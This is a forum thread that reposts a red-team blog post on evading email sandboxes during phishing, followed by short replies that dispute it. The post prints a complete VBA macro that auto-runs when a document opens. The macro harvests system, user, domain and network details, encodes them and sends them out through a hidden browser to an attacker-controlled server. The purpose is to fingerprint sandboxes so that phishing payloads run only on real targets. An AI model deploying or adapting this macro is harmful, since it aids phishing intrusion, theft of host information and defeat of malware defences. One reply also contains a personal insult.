Batu69 Posted September 27, 2016 Share Posted September 27, 2016 I decided to mix things up a little bit and do a blog post on something a little different than the usual vulnerability research or CTF write-ups. The bulk of our day job is focused on performing long term external assessments on customer networks, so I thought it might be useful to others to do a post on some hurdles we have had to overcome recently in regards to phishing. In our experience, phishing is probably responsible for somewhere around 80% of initial network access from external sources. Unfortunately this is due to poor user security training and a handful of other debatable reasons. To try and solve the overwhelming problem of click-happy users, IT administrators have begun installing hardware devices that sandbox incoming emails that contain macros to determine if they perform malicious activity. These devices have become quite effective in stopping suspicious emails from even reaching users. If you talk to anyone that has been working in security for any significant amount of time, they will tell you that offensive and defensive techniques evolve directly as a result of advances in the other. In our scenario, offensive tactics consisted of emailing users with macros. As a result, defensive tools were developed to sandbox these emails to identify malicious activity. The next natural progression is offensive techniques that render sand-boxing useless. Our team had reasonable success bypassing these devices using various tricks employed by modern malware; https://threatpost.com/malware-evades-detection-with-novel-technique/120787/, http://www.securityweek.com/dyre-banking-trojan-counts-processor-cores-detect-sandboxes. Realizing that this problem was only going to become more prevalent, we decided to take the idea behind the above links one step further. We chose to exploit the function of these devices to bypass them. Given that they are designed to execute all code passed to them in a sandbox, we decided we would target the sand-boxing hardware specifically. We picked an arbitrary email address in the target domain, constructed a blatant phishing email that the target would likely see often, and attached a macro that performed extensive enumeration of any system that ran the macro. The macro then takes the results of this enumeration and posts it back to an attacker controlled server. Using the results from the enumeration script, we are now able to create a macro that will only run on systems that do not match the fingerprint of the data we received from the email sandbox. This test can be repeated as many times as the red teamer feels is necessary to gain confidence in the results. An example enumeration macro is listed below. Function MakeModel() retStr = "" strComputer = "." strQuery = "SELECT * FROM Win32_ComputerSystem" Set objWMIService = GetObject("winmgmts:\\" & strComputer & "\root\cimv2") Set colItems = objWMIService.ExecQuery(strQuery) For Each objItem In colItems retStr = objItem.Manufacturer retStr = retStr & "|" & objItem.Model Next MakeModel = retStr End Function Function EnvironVars() sHostname = Environ("computername") & "|" & Environ("username") & _ "|" & Environ("userdomain") & "|" & Environ("LOGONSERVER") EnvironVars = sHostname End Function Function RecentFiles() Set wdApp = ActiveDocument.Application RecentFiles = wdApp.RecentFiles.Count End Function Function GetCores() Dim objWMIService, cores, Proc, strQuery strQuery = "select * from Win32_PerfFormattedData_PerfOS_Processor" Set objWMI = GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\cimv2") Set cores = objWMI.ExecQuery(strQuery, , 48) Set GetCores = cores End Function Function GetNetwork() retStr = "" strComputer = "." strQuery = "Select * From Win32_NetworkAdapter Where PhysicalAdapter = True" Set objWMIService = GetObject("winmgmts:\\" & strComputer & "\root\cimv2") Set colItems = objWMIService.ExecQuery(strQuery) Set ipItems = objWMIService.ExecQuery("Select * From Win32_NetworkAdapterConfiguration") For Each objItem In colItems strMacAddress = objItem.MACAddress sysName = objItem.SystemName For Each ipItem In ipItems If ipItem.MACAddress = strMacAddress And ipItem.IPEnabled = "True" Then retStr = retStr & strMacAddress & "|" & ipItem.IPAddress(0) & "|" Exit For End If Next Next GetNetwork = retStr End Function Private Function Enc(ByVal strData As String) As Byte() Dim arrData() As Byte arrData = StrConv(strData, vbFromUnicode) Set objXML = CreateObject("MSXml2.DOMDocument") Set objDocElem = objXML.createElement("data") objDocElem.dataType = "bin.base" & Chr(54) & Chr(52) objDocElem.nodeTypedValue = arrData Enc = objDocElem.Text Set objNode = Nothing Set objXML = Nothing End Function Private Function Dec(ByVal strData As String) As Byte() Set objXML = CreateObject("MSXml2.DOMDocument") Set objDocElem = objXML.createElement("data") objDocElem.dataType = "bin.base" & Chr(54) & Chr(52) objDocElem.Text = strData Dec = objDocElem.nodeTypedValue Set objNode = Nothing Set objXML = Nothing End Function Sub DoStuff(ByVal strData As String) Dim IE As Object Dim strBaseURL As String Dim pre As String address = "http://127.0.0.1/" 'strBaseURL = StrConv(Dec(address), 64) Set IE = CreateObject("InternetExplorer.Application") IE.Visible = False IE.navigate address & strData On Error GoTo ErrorHandler Do While IE.Busy: DoEvents: Loop Do While IE.ReadyState <> 4: DoEvents: Loop Set doc = IE.Document If Not IsNull(doc.getElementById("overridelink")) Then Set lnkOverRide = doc.getElementById("overridelink") If Not lnkOverRide Is Nothing Then lnkOverRide.Click Do While IE.Busy: DoEvents: Loop Do While IE.ReadyState <> 4: DoEvents: Loop Set doc = IE.Document End If Else Do While IE.Busy: DoEvents: Loop Do While IE.ReadyState <> 4: DoEvents: Loop Set doc = IE.Document End If Dim testString As String testString = IE.Document.body.innerText IE.Stop IE.Quit ErrorHandler: Exit Sub End Sub Sub AutoOpen() Dim retStr As String Set cores = GetCores Length = 0 For Each i In cores Length = Length + 1 Next retStr = Str(Length - 1) retStr = retStr & "|" & RecentFiles retStr = retStr & "|" & EnvironVars retStr = retStr & "|" & GetNetwork retStr = retStr & "|" & MakeModel retStr = Enc(retStr) DoStuff (retStr) End Sub We believe this technique to be reasonably effective against most modern email sandboxes. The only mitigation to this technique is if the results could be randomized or if the outgoing connection with the results was blocked. The first mitigation would be quite difficult since the enumeration script can poll any number of identifying pieces of data. The second would also be difficult since the purpose of the sandbox is to let the malware run in order to profile it. For now, our team will save a few more hours creating phishing content and a few more dollars buying phishing domains. The ball is back in your court defense. Article source Link to comment Share on other sites More sharing options...
straycat19 Posted September 27, 2016 Share Posted September 27, 2016 This author is a couple years behind on his research. We quit sandboxing and went to blocking emails with attachments (the macro is an attachment) in 2013. No email that originates outside of our own email server is allowed if it contains an attachment. All emails are text based with no html allowed. All hyperlinks are removed. Email phishing has become a thing of the past if you are truly interested in securing your network and don't mind investing a little time and money in putting together a good security team. Link to comment Share on other sites More sharing options...
Holmes Posted September 27, 2016 Share Posted September 27, 2016 You are lying stray you said friday you and your so called organization do this: Quote We provide an FTP server for files that need to be sent to us so we can scan them and test them in a sandbox before notifying the recipient that they have a file on the server. Actual detection of files containing malware using this system has been less than one in a million. It appears that most the script kiddies are too lazy to find and upload files to an FTP server. Of course, other checks are also made before the files can be uploaded, such as is it coming from an authorized IP. Thats a excerpt from this post: Now you say they quit using sandboxing your a pathological liar and have many posts proving that dont you have better shit to do then waste everybody's time. Link to comment Share on other sites More sharing options...
Recommended Posts
Archived
This topic is now archived and is closed to further replies.